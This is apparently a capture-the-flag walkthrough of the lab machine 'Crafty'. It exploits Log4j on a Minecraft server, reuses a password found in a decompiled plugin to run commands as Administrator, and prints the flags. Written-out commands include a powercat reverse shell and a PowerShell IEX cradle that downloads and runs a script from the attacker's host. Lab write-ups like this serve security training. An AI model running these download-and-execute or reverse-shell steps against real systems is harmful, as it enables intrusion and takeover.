Crafty

Recon

nmap_scan.log

HTTP (80)

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Bizness/Apache-OFBiz-SHA1-Cracker]
└─$ bat /etc/hosts
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: /etc/hosts
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────
  10   │ 10.10.11.249    crafty.htb  play.crafty.htb

![Pasted_image_20240513004332.png]]![Pasted_image_20240513005444.png

Nothing interesting on webserver so far, let's move on to Minecraft server

Minecraft (25565)

Download the Client: https://github.com/UltimMC/Launcher?tab=readme-ov-file

Install 1.16.5 version as suggested by nmap

Playing inside a VM do be trippy...

The server doesn't allow you to move or anything and you only have access to chat so I decided to use Console Client: https://github.com/MCCTeam/Minecraft-Console-Client

Log4j exploit: https://github.com/kozmer/log4j-shell-poc/tree/main Get required Java version for the exploit: https://mirrors.huaweicloud.com/java/jdk/8u202-b08/

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Crafty]
└─$ ./MinecraftClient-20240415-264-linux-x64 hacka '' 10.10.11.249:25565

Changes:

A bit of a jetlag on reverse shell, but it worked after hitting Enter.

User.txt

(remote) svc_minecraft@CRAFTY:C:\users\svc_minecraft$ type desktop/user.txt
type desktop/user.txt
12ec614380f93560d60bb545364e498d

Privileges Escalation

After doing tree /f I noticed plugins directory which seemed interesting. Since we are in pwncat-cs we can utilize download command:

(remote) svc_minecraft@CRAFTY:C:\users\svc_minecraft\server\plugins$
(local) pwncat$ download playercounter-1.0-SNAPSHOT.jar
playercounter-1.0-SNAPSHOT.jar ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 10.0/10.0 KB • ? • 0:00:00
[14:10:19] downloaded 10.00KiB in 3.44 seconds   

jd-gui can be used to view source of Jar file.

Pasted_image_20240513221510.png

rcon = new Rcon("127.0.0.1", 27015, "s67u84zKq8IXw".getBytes());

Nothing interesting in C:\inetpub\wwwroot\web.config and playcount.txt doesn't exist.

Anyway: RCON is a TCP/IP-based protocol that allows server administrators to remotely execute Minecraft commands. Introduced in Beta 1.9-pre4, it's basically an implementation of the Source RCON protocol for Minecraft.

Hmmm... After some googling it seems this protocol isn't exactly safe. server.properties revealed that it's running on rcon.port=25575. The rcon seemed like a deadend because it has precompiled binary jar and is using it, command is fixed so that's downer.

We did find the password, could it be admin password? runas for some reason wasn't working so I uploaded RunasCs.exe:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Crafty]
└─$ cp /opt/scripts/exploit/RunasCs/RunasCs.exe rc.exe

---

(remote) svc_minecraft@CRAFTY:C:\users$ cd $ENV:TEMP
cd $ENV:TEMP
(remote) svc_minecraft@CRAFTY:C:\Users\svc_minecraft\AppData\Local\Temp$
(local) pwncat$ upload rc.exe
./rc.exe ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 51.7/51.7 KB • ? • 0:00:00
[14:46:25] uploaded 51.71KiB in 1.34 seconds                                                 upload.py:76
(local) pwncat$
(remote) svc_minecraft@CRAFTY:C:\Users\svc_minecraft\AppData\Local\Temp$ .\rc.exe Administrator s67u84zKq8IXw "whoami /priv"
.\rc.exe Administrator s67u84zKq8IXw "whoami /priv"

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Crafty]
└─$ powercat -c 10.10.16.74 -p 4444 -e cmd -g > rev.ps1

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Crafty]
└─$ serve 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.249 - - [13/May/2024 15:23:06] "GET /rev.ps1 HTTP/1.1" 200 -

---

(remote) svc_minecraft@CRAFTY:C:\Users\svc_minecraft\AppData\Local\Temp$ .\rc.exe Administrator s67u84zKq8IXw "powershell -c IEX (New-Object Net.WebClient).downloadString('http://10.10.16.74:8000/rev.ps1')"

I originally was using pwncat-cs but it was doing some funky stuff and kept disconnecting, so I just decided to stick to the basics, just netcat.

Root.txt

Note: Im back to Kali and the command is powercat from apt, no longer on arch. Vanilla would be to just activate powershell and then generate payload.

C:\Users\Administrator>dir /s/b *.txt
...
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
C:\Users\Administrator\AppData\Local\Temp\RDR270F.tmp\empty.txt
C:\Users\Administrator\AppData\Local\Temp\RDRFC1A.tmp\empty.txt
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\Administrator\Desktop\root.txt
...

C:\Users\Administrator>type C:\Users\Administrator\Desktop\root.txt
2737bbe85a910b6d859b44d96240c7d6

---

Holy shit, catching the user shell was the hardest part because the damn server kept crashing and restarting box was pain 1. needed user votes, 2. restart limit.